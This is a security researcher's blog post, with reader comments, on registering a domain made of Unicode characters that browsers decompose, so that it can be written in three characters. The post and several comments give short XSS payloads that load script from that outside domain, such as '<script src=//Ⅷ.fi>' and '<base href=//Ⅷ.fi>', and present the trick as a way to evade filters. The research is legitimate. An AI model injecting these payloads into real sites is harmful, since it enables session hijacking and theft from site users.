Buying a single character domain - and 3 character FQDN - for £15
Short domains are useful for security testing. If you only have a limited number of characters, you need to be able to reference code on a remote server in as few characters as possible.
A few years ago, I tried to find a Minimum Viable XSS. The conclusion that I (and others) came to is that 20 characters is the bare minimum. But it requires you have a 2 character domain name on a 2-character TLD. Something like xy.uk
I don't think any 1- or 2-character domain names are available. If they're for sale, it will be at extortionate price. There are no Top-Level Domains shorter than 2 characters.
So, let's cheat!
This is the story of how I bought a single character domain, and am able to reference it in 3 characters, for the cost of a round of drinks.
Brief History
As I discussed in Domain hacks with unusual Unicode characters - there are a bunch of single Unicode codepoints which are normalised to 2- or 3-character sequences.
For example, ㎐
is the scientific symbol for Hertz. It is a single codepoint (U+3390). When your browser sees it in a domain name, it automatically splits it into the H
and z
characters. This is called decomposition.
Based on my count, there are about 90 symbols which decompose into 2 characters - for example ™
, ㏄
, dz
. There are about 35 symbols which decompose into 3 characters - for example ㎪
, ㍹
, ffi
.
But, as mentioned, it is almost impossible to find a cheap 2- or 3-letter domain name.
There are, however, a couple of four character decompositions!
Quidquid latine dictum sit, altum videtur
The Romans didn't use a positional number system. The number 1 was Ⅰ, the number 2 was Ⅱ, the number 9 was Ⅸ.
But - look closely! The Ⅰ
is not the English letter I
- it is its own, separate, Unicode character (U+2160). And Ⅱ
is not two Ⅰ
s smushed together, it is (U+2161).
When decomposed, however, they return to English letters.
What's the longest Roman numeral captured in a single codepoint?
The number 8 is Ⅷ
(U+2167) - which decomposes to V I I I. Four characters!
but apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, public health, and a number system suitable for character decomposition what have the Romans ever done for us?
tl;dr TLD
There are a number of Top-Level Domains which can also be represented by a single character.
For example, Australia's TLD .au
can be represented by the Astronomical Unit sign ㍳
(U+3373).
Most of those domains were expensive, or unavailable. But I found one which was both cheap and available.
Yes! The orthographic ligature of fi
decomposes to f
and i
. That's the TLD for Finland.
I was able to register a Finnish domain on Gandi for £15.
Ⅷ.fi
That's Roman Numeral Eight (U+2167), dot (U+002E), Latin Small Ligature Fi (U+FB01).
Is this useful?
This gives me a Minimum Viable XSS in eighteen characters!
<script src=//Ⅷ.fi>
I'm pretty sure that's the shortest possible sequence!
Or, for loading remote resources in 15 characters:
<img src=//Ⅷ.fi>
There aren't many sites which are secured only by using a restricted character count - thankfully! But shrunk domains can also be useful for evading all sorts of filters.
Other domains are available
There's one other 4-character decomposition available - see if you can find it!
There are a few shrinkable TLDs which still have some of the 2- and 3-character domains available, but they are extortionately priced.
If you do grab one of these, and make something cool with it, please let me know.
Support this blog
If you've learned something from my blog posts, here's how you can return the favour:
- Get cheap domains and hosting from Gandi - use that link and I get €5.
- Buy me something nice from my Amazon wishlist
- Support me on Ko-Fi
Matt says:
Is it kcal? U+3389 nice article!
Neil Brown said on twitter.com:
Clever!
Michæl Brunton-Spall said on twitter.com:
Yay. I knew it would be something like this. That’s cute.
Esko Reinikainen 🇪🇺🇫🇮💯 said on twitter.com:
Looks like .fi domains are versatile.
gorzilla said on twitter.com:
I’m surprised to learn there are chars that expand into slashes. That seems like it could be really useful but I’m not sure what for 🤔
HackerNewsTop10 said on twitter.com:
Buying a single character domain – and 3 character FQDN – for £15 Link: shkspr.mobi/blog/2020/08/b… Comments: news.ycombinator.com/item?id=241681…
gorzilla said on twitter.com:
Outside of DNS I wonder if a powershell script with a .㎰1 ending would do anything interesting
Andrew Dent said on twitter.com:
Not working on iOS Safari without protocol ...? Ⅷ.fi ❌ https://Ⅷ.fi/ ✅
Andrew Dent said on twitter.com:
Is the Unicode > plain text expansion handled at a WebKit or OS level? 🤔
@mikko said on twitter.com:
Very cool and nice post!
Couple of years ago you could do the same trick (on most browsers) in just TWO characters. This trick was using Unicode letters like ’⒉ ’ or ’⒖ ’ or ’🄀 ’, and for the TLD letters like ’fi’ or ’℡’ or ’™’.
GC says:
Does if really work? Won't the domain and tld be translated into punycode IDN? You'd get "xn--x4g.xn--jm6c"... On top of xn--jm6c not being a valid TLD, it isn't that short anymore...
@edent says:
It does work. Copy and past these characters into your browser to test
Ⅷ.fi
There is no Punycode. Your browser performs the IDNA2008 process listed in RFC5895 to normalise it first.
Justin List 🗿 said on twitter.com:
I just bought XIV.fi thanks for the heads up
renniepak said on twitter.com:
I was looking into the exact same thing lately and ended up settling for a 3 char domain: ㎠.℡ (which is still pretty awesome!)
Funny to read you had the same journey!
Roninkoi said on twitter.com:
As of today, I'm the proud owner of the 3 char domain https://㎦.fi
It consists of the Unicode characters for cubic kilometer and fi ligature, which decompose in most browsers as explained here: shkspr.mobi/blog/2020/08/b…
RonaldL says:
Awesome write-up. I ran into the same problem today, and used your solution. I even managed to get it down to 17 even by using the following:
//â §.ï¬
And return an svg file containing the xss. I cheated and altered the answer, because I don't own the domain. But it works.
RonaldL says:
Well that didn't work. It should read: < embed src=//Ⅷ.fi >
Without the spaces.
Dominic Sayers ☠ :mastodon: said on mastodon.social:
@Edent Turns out I actually own a 2-character domain at a shrinkable TLD: https://al.㏉/
I didn't know about this decomposition before - thanks!
MLT says:
Also 17 chars: < base href=//Ⅷ.fi > I have an idea to get it down to 16 with some more IDN Homograpg tricks.